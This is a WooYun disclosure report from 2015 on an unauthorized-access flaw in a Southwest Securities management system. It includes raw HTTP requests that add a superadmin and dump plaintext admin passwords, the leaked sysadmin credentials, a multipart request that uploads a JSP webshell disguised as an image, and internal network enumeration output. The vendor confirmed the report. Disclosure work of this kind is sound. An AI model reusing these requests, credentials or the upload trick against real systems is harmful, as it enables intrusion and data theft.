当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149591

漏洞标题:西南证券某系统大量页面未授权访问导致进后台上传可威胁内网

相关厂商:西南证券股份有限公司

漏洞作者: 路人甲

提交时间:2015-10-26 17:15

修复时间:2015-12-11 10:02

公开时间:2015-12-11 10:02

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-27: 厂商已经确认,细节仅向厂商公开
2015-11-06: 细节向核心白帽子及相关领域专家公开
2015-11-16: 细节向普通白帽子公开
2015-11-26: 细节向实习白帽子公开
2015-12-11: 细节向公众公开

简要描述:

未授权访问导致新增超管帐号,进一步getshell可内网

详细说明:

西南证券后台管理

QQ截图20151026160129.jpg


问题地址:

http://www.swsc.com.cn:8080/manage/admin/admin.jsp


可直接新增超管帐号

QQ截图20151026164519.jpg


我新增了一个帐号wpp,密码wpp123
登录后台

QQ截图20151026164614.jpg


但是我发现居然都没有权限

QQ截图20151026164746.jpg

漏洞证明:

但是通过抓包得到具体页面的访问链接后,直接访问是可以操作

QQ截图20151026165005.jpg


比如http://www.swsc.com.cn:8080/manage/zsk/commoninfo.html

QQ截图20151026164945.jpg


所以好戏来了
http://www.swsc.com.cn:8080/manage/expert/expertinfo.htm

QQ截图20151026165101.jpg


QQ截图20151026165404.jpg


在回过头来看,访问http://www.swsc.com.cn:8080/manage/admin/admin.jsp时,抓包得到一个请求

POST http://www.swsc.com.cn:8080/manage/admin/getAdmin.jsp HTTP/1.1
Host: www.swsc.com.cn:8080
Connection: keep-alive
Content-Length: 8
Origin: http://www.swsc.com.cn:8080
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://www.swsc.com.cn:8080/manage/admin/admin.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=4BCD236BE71708F06A5C5A03AD8D5385
limit=10


QQ截图20151026165953.jpg


响应是所有管理用户的帐号和明文密码
得到超管帐号id:'sysadmin',password:'sswwsscc'
用超管登录系统上传shell

QQ截图20151026170437.jpg


抓包改包

POST http://www.swsc.com.cn:8080/manage/upload/upload.jsp?select=top HTTP/1.1
Host: www.swsc.com.cn:8080
Connection: keep-alive
Content-Length: 4381
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.swsc.com.cn:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3CbtnXiB0bdXaBER
Referer: http://www.swsc.com.cn:8080/manage/upload/upload.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=4BCD236BE71708F06A5C5A03AD8D5385
------WebKitFormBoundary3CbtnXiB0bdXaBER
Content-Disposition: form-data; name="select"
top
------WebKitFormBoundary3CbtnXiB0bdXaBER
Content-Disposition: form-data; name="attachFile"; filename="01.jsp"
Content-Type: image/gif
test	    
------WebKitFormBoundary3CbtnXiB0bdXaBER
Content-Disposition: form-data; name="borrow"
top
------WebKitFormBoundary3CbtnXiB0bdXaBER--


上传后的路径是http://www.swsc.com.cn:8080/manage/upload/banner_image.jsp
密码02q3

QQ截图20151026161742.jpg


[*] 基本信息 [ C:D:E:F:H: ]
D:\apache-tomcat-6.0.26\webapps\ROOT\manage\upload\> arp -a
Interface: 10.150.28.106 --- 0x10003
  Internet Address      Physical Address      Type
  10.150.28.101         00-22-19-d1-ea-68     dynamic   
  10.150.28.102         a4-ba-db-39-b3-58     dynamic   
  10.150.28.103         a4-ba-db-39-9d-24     dynamic   
  10.150.28.107         00-26-b9-fb-79-18     dynamic   
  10.150.28.254         00-00-0c-07-ac-1f     dynamic   
D:\apache-tomcat-6.0.26\webapps\ROOT\manage\upload\> net view
服务器名称            注释
-------------------------------------------------------------------------------
\\CRM-DBBAK                                                                    
\\CWFWQ                                                                        
\\CWFWQ3                                                                       
\\HSSJWG               恒生数据网关                                            
\\SVCTAG-8184W2X                                                               
\\SWSC-1HB3                                                                    
\\SWSC-BIGDATA                                                                 
\\SWSC-FXQ             swsc-fxq                                                
\\SWSC-NKXT-WEB1                                                               
\\UTJV                                                                         
\\WIN-4UUEK1U2RPR                                                              
\\WIN-6F7S1SLEA18                                                              
\\WIN-6GTG26QFPMO                                                              
\\WIN-A0SKMQR8E83                                                              
\\WIN-BCN89NXXOTB                                                              
\\WIN-DU9SEX0HQ00                                                              
\\WIN-H31FA5OIY7U                                                              
\\WIN-I4EZHB0AK0Y                                                              
\\WIN-KFTGGVCR11B                                                              
\\WIN-QW7WXU1GFJD                                                              
\\WIN-ZT2JUMGEGSB                                                              
\\WIN3H41GR9AQTI                                                               
\\WINDOWS-AK1AC3G                                                              
\\WINDOWS-CH7GNP0                                                              
\\WINDOWS-G739AM2                                                              
\\WINDOWS-PE11G9N                                                              
\\WINDOWS-V2NIV3H                                                              
\\XNZQ-CWDB1                                                                   
\\XY-WEB1              xy-WEB1                                                 
\\XY-WEB2                                                                      
\\ZCGL-MC1                                                                     
命令成功完成。
D:\apache-tomcat-6.0.26\webapps\ROOT\manage\upload\>


可威胁内网

QQ截图20151026161813.jpg


QQ截图20151026161821.jpg


QQ截图20151026171436.jpg


最后我把shell删除了

修复方案:

好吧,检查全站还有没有shell,下线系统修复漏洞

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-27 10:00

厂商回复:

非常感谢,我们正在积极修复,如还有遗漏请指出

最新状态:

暂无